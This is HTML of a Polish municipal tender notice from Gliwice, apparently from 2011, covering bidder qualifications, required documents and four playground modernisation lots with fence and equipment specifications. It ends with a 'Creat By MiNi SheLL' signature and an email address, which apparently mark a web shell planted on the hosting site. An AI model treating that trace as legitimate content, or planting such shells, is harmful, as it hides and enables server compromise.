- minimum dwóch kierowników budowy - posiadających uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, będący członkiem Okręgowej Izby Inżynierów Budownictwa - kiedy wykonawca ubiega się o więcej niż dwie części zamówienia,
B. Personel wykonawczy oprócz personelu kierowniczego:
- minimum 10 osób kiedy wykonawca ubiega się o jedną część zamówienia,
- minimum 20 osób kiedy wykonawca ubiega się o dwie części zamówienia,
- minimum 30 osób kiedy wykonawca ubiega się o trzy części zamówienia,
- minimum 40 osób kiedy wykonawca ubiega się o cztery części zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na prawidłowe wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zamawiający dopuszcza zmianę osób reprezentujących zamawiającego i wykonawcę na podstawie pisemnego powiadomienia stron, bez konieczności aneksowania umowy,
-	zmiany przedstawicieli uczestników procesu inwestycyjnego,
-	zmiany nazwy lub siedziby firmy zamawiającego lub wykonawcy,
-	działania siły wyższej
-	zawieszenia przez zamawiającego wykonania roboty budowlanej,
-	rezygnacji z wykonania części roboty budowlanej,
- wystąpienia warunków atmosferycznych uniemożliwiających wykonanie zadania,
- jeżeli w trakcie robót ziemnych wykonawca natrafi na pozostałości II wojny światowej,
- konieczności wykonania prac archeologicznych ( badań archeologicznych)
-	braków lub wad w dokumentacji projektowej lub innych dokumentach budowy,
-	wstrzymania prac ze względu na ustawową działalność osób trzecich,
-	zmiany podwykonawcy,
-	zmian w harmonogramie rzeczowo-finansowym,
-	wystąpienia zamówień dodatkowych niezbędnych do prawidłowego wykonania zadania podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia,
- nieterminowego przekazania placu budowy,
- zmiany obowiązujących przepisów prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mzuk.gliwice.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZARZĄD USŁUG KOMUNALNYCH
44-109 Gliwice 
ul. Strzelców Bytomskich 25 c
Dział Planowania i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2011 godzina 11:30, miejsce: MIEJSKI ZARZĄD USŁUG KOMUNALNYCH
44-109 Gliwice 
ul. Strzelców Bytomskich 25 c 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja skweru Nacka wraz z placem zabaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Zagospodarowanie skweru Nacka
1. Zagospodarowanie skweru Nacka.
2. Ogrodzenie placu zabaw.
3. Odgrodzenie boiska od ulicy.
4. Mała architektura i zieleń.
Inwestycja swoim zakresem obejmować będzie:
1.	Roboty pomiarowe,
2.	Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Roboty murowe,
5. Rozbiórka starych alejek,
6. Podbudowy pod chodniki, ciągi komunikacyjne, 
7. Nawierzchnie z kostki brukowej, 
8. Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9. Montaż ławek (21 szt. na terenie parku i 6 szt. na terenie placu zabaw).) i koszy (21 szt. na terenie parku i 7 szt. na terenie placu zabaw) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. Miejsca montażu ławek i koszy zostaną wskazane przez Zamawiającego w trakcie budowy,
10. Wykonanie ogrodzenia placu zabaw - ogrodzenie z paneli wraz z montażem furtek z samozamykaczem i przęsła technicznego (rysunek AB_5 - zmiana wysokości ogrodzenia na 120 cm - zgodnie z projektem firmy SMM A. Matuszczak),
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru.
11. Wykonanie ogrodzenia boiska od strony ul. Toszeckiej,
12. Założenie nowych trawników dywanowych na terenie całego skweru (także w miejscu zdemontowanych alejek) z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
13. Zakup i transport ziemi do wykonania trawników i nasadzeń,
14. Nasadzenia i roboty pielęgnacyjne w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
15. Wycinka drzew po stronie Zamawiającego.
Uwaga: opis materiału roślinnego zamieszczony w załączniku A. 
Uwaga: usuwa się z przedmiaru robót (modernizacja skweru) pozycje: 9.d.1, 10.d.1, 16.d.2, 37.d.3 i 38.d.3

B. Modernizację placu zabaw skwer Nacka w Gliwicach
1. Modernizacja placu zabaw.
2. Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1. Roboty pomiarowe,
2. Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Podbudowy pod chodniki
5. Nawierzchnie z kostki brukowej,
6. Pole piaskowe,
7. Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8. Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9. Montaż ławek (6 szt.) i koszy (7 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10. Demontaż istniejących elementów placu zabaw oraz transport w miejsce wskazane przez Zamawiającego.
11. Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 1szt., huśtawka wagowa 1szt., bujak 4-osob.1szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt,. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
12. Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
13. Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
14. Zakup i transport ziemi do wykonania trawników.
Uwaga: usuwa się z projektu rysunki dotyczące montażu oraz wykonania ogrodzenia. Ogrodzenie ujęto w projekcie modernizacji skweru Nacka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizację placu zabaw przy ul. Derkacza w Gliwicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, w tym:
1. Modernizacja placu zabaw.
2. Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1 Roboty pomiarowe,
2 Roboty rozbiórkowe,
3 Roboty przygotowawcze i ziemne,
4 Podbudowy pod chodniki,
5 Nawierzchnie z kostki brukowej,
6 Pole piaskowe,
7 Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8 Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9 Montaż ławek (8 szt.) i koszy (8 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10 Demontaż istniejących elementów placu zabaw oraz transport w miejsce wskazane przez Zamawiającego.
11 Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 1szt., huśtawka wagowa 1szt., bujak pojedynczy 2szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt, przeplotnia łukowa 1szt. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
12 Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
13 Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
14 Zakup i transport ziemi do wykonania trawników.
15 Montaż ogrodzenia z ceownika zimnogiętego na słupkach wraz z bramkami wejściowymi samozamykającymi według projektu.
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizację placu zabaw przy ul. Gagarina w Gliwicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, w tym:
1.Modernizacja placu zabaw.
2.Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1. Roboty pomiarowe,
2. Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Podbudowy pod chodniki
5. Nawierzchnie z kostki brukowej,
6. Pole piaskowe,
7. Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8. Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9. Montaż ławek (8 szt.) i koszy (8 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10. Demontaż istniejących elementów placu zabaw oraz transport w miejsce wskazane przez Zamawiającego.
11. Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 1szt., huśtawka wagowa 1szt., bujak pojedynczy 2szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt, przeplotnia łukowa 1szt. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
12. Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
13. Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
14. Zakup i transport ziemi do wykonania trawników.
15. Montaż ogrodzenia z ceownika zimnogiętego na słupkach wraz z bramkami wejściowymi samozamykającymi     według projektu.
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Budowę placu zabaw przy ul. Planetarnej - Piaskowej w Gliwicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, w tym:
1. Modernizacja placu zabaw.
2.Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1 Roboty pomiarowe,
2 Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Podbudowy pod chodniki
5. Nawierzchnie z kostki brukowej,
6. Pole piaskowe,
7. Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8. Demontaż ławek i piaskownicy.
9. Montaż ławek (7 szt.) i koszy (7 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10. Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 2szt., huśtawka wagowa 1szt., bujak pojedynczy 1szt., bujak 4-osob.1szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt, przeplotnia łukowa 1szt. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
11. Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
12. Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
13. Zakup i transport ziemi do wykonania trawników.
15. Montaż ogrodzenia z ceownika zimnogiętego na słupkach wraz z bramkami wejściowymi samozamykającymi     według projektu.
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw. tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com